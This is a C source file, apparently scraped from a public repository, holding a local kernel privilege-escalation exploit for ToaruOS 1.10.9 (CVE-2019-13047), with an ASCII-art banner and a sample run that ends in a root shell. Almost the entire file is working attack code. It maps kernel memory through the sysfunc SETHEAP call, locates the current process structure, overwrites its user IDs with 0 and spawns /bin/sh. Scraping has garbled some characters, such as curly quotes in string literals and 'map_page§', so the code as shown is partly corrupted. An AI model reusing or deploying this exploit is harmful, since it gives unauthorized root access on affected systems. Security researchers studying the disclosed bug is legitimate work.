CVE-2019-13047: kowasuos/kowasu-sysfunc.c at master · mehsauce/kowasuos

/* * The Mickey Mouse Hacking Squadron proudly presents * * CVE-2019-13047 * * ToaruOS 1.10.9 sysfunc local kernel exploit * * .-“"”-. * / . - \ * \ / * .-“”-.,:.-_-.< * / _; , / ).| * \ ; / ` `" '\ * '.-| ;-.____, | ., * \ `._~_/ / /"/ * ,. /`-.__.-‘\`-._ ,",’ ; * \"\ / /| o \._ `-._; / ./-. * ; ‘;, / / | `__ \ `-.,( / //.-' * :\ \\;_.-" ; |.-"` ``\ /-. /.-' * :\ .\),.-' / }{ | ‘…’ * \ .-\ | , / * ‘…’ ;’ , / * ( __ `;–;’__`) * `//’` `||` * _// || * .-"-._,(__) .(__).-“”-. * / \ / \ * \ / \ / * `’–=="–` `–""==–’` * * local@livecd ~$ gcc -Wall kowasu-sysfunc.c -o kowasu-sysfunc * local@livecd ~$ whoami * local * local@livecd ~$ ./kowasu-sysfunc * [ ] Scanning for ‘current_process’ symbol… * symbol: 00122804 * current_process: 0184a010 * [ ] Sanity checking ‘process_t’ structure… * getpid(): 206 * current_process->id: 206 * [ ] Spawning self-righteous root shell… * 0@livecd /home/local# whoami * root */ #include <stdio.h> #include <stdint.h> #include <stdlib.h> #include <unistd.h> #include <sys/sysfunc.h> #define KERNEL_SCAN_START (1024U * 1024U) #define KERNEL_SCAN_END (1024U * 2048U) /* Partial process structure specifying the members we need. */ struct process { pid_t id; char * name; char * description; unsigned int user; unsigned int real_user; }; void *memmem(const void *haystack, size_t haystacklen, const void *needle, size_t needlelen) { const unsigned char *p = haystack; const unsigned char *end = p + haystacklen - needlelen + 1; for (; p < end; p++) { size_t i; for (i = 0; i < needlelen; i++) if (p[i] != ((unsigned char *)needle)[i]) break; if (i == needlelen) return (void *)p; } return NULL; } void map_page(void *address) { char *args[] = { address }; static void *brk = NULL; /* Keep track of the original break, as we need to restore * proc->image.heap and proc->image.heap_actual to ensure malloc() * will not use sbrk() and serve kernel pages back to libc. */ if (brk == NULL) brk = sbrk(4096); if (sysfunc(TOARU_SYS_FUNC_SETHEAP, args) < 0) { perror(“sysfunc()"); exit(EXIT_FAILURE); } /* Restore the original break. */ args[0] = brk; if (sysfunc(TOARU_SYS_FUNC_SETHEAP, args) < 0) { /* If we fail, do not print, as it could malloc(). */ _exit(EXIT_FAILURE); } } void spawn_shell(void) { char * const arg[2] = { “sh", NULL }; execve(“/bin/sh", arg, NULL); perror(“execve()"); exit(EXIT_FAILURE); } int main(void) { struct process *current_process; uintptr_t addr; pid_t pid; pid = getpid(); printf("[ ] Scanning for ‘current_process’ symbol…\n”); for (addr = KERNEL_SCAN_START; addr < KERNEL_SCAN_END; addr += 4096) { void *p = (void *)addr; map_page§; if ( (p = memmem(p, 4096, “current_process", 16))) { current_process = *((void **)p - 1); break; } } if (addr >= KERNEL_SCAN_END) { printf(" not found…\n”); exit(EXIT_FAILURE); } printf(" symbol: %p\n", current_process); map_page(current_process); current_process = *((void **)current_process); printf(" current_process: %p\n", current_process); printf("[ ] Sanity checking ‘process_t’ structure…\n”); printf(" getpid(): %d\n", pid); printf(" current_process->id: %d\n", current_process->id); if (pid != current_process->id) { printf(" mismatching PID, exiting…\n”); exit(EXIT_FAILURE); } printf("[ ] Spawning self-righteous root shell…\n”); current_process->user = 0; current_process->real_user = 0; spawn_shell(); }